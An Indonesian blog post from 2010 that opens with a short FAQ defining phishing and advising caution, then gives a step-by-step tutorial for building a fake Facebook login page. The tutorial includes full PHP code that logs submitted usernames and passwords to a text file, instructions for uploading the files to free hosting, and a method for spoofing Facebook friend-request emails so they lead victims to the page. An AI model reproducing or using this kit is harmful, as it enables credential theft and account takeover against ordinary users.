Senin, 03 Mei 2010

========== F.A.Q PHISING: ==========

I.
Phising , adalah tindakan memperoleh informasi pribadi seperti User ID, PIN,
nomor rekening bank, nomor kartu kredit Anda secara tidak sah. Informasi ini kemudian akan dimanfaatkan oleh pihak penipu untuk mengakses rekening, melakukan penipuan kartu kredit atau memandu nasabah untuk melakukan transfer ke rekening tertentu dengan iming-iming hadiah

II.
Bagaimana phishing dilakukan?
Teknik umum yang sering digunakan oleh penipu adalah sebagai berikut:

* Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan user sehingga user terpancing menerima keabsahan e-mail atau web sites. Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau merk dagang milik lembaga resmi, seperti; facebook, yahoo, bank atau penerbit lainnya. Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi, seperti; password, PIN dan nomor kartu kredit

* Membuat situs palsu yang sama persis dengan situs resmi atau pelaku phishing mengirimkan e-mail yang berisikan link ke situs palsu tersebut.

* Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim.

III.
Mencegah phishing
Jangan mudah terpancing untuk mengikuti arahan/petunjuk apapun sehubungan informasi data, rekening atau informasi penting lainnya, yang dianjurkan pada e-mail yang dilink ke situs tertentu. Jika Anda menerima e-mail sejenis ini dan mengatasnamakan Lembaga tertentu yang mencurigakan atau ASPAL, berhati-hatilah.


=============================
Cara Membuat Perangkap Penyadapan [Phising]
=============================

1. buka http://www.facebook.com/login.php,
lalu view source. copy dan paste ke notepad.
Cari "action=" (tanpa quote) dan kita akan memulai editingnya.
pada action="https://login.facebook.com/login.php" ubahlah menjadi action="next.php"
kemudian ubah juga methode dari "POST" menjadi "get"

simpan notepad ini menjadi index.php (jangan html)

2. buka notepad baru isikan kode berikut :


Code: Select all
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



--> Simpan sebagai next.php


3. Buka notepad lagi biarkan kosong, lalu simpan dng nama pass.txt.
Upload 3 file tersebut "index.php, next.php, pass.txt" kedalam hosting misalnya 110mb.com, spam.com atau 007sites.com.

OK, Kamu sudah punya phising page facebook sekarang.

4. Langkah-langkah spoofing.
copy content asli undangan pertemanan dari facebook.
edit hyperlink dari : "http:/www.facebook.com/n/?reqs.php"
ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu.

Tidak ada komentar:

Posting Komentar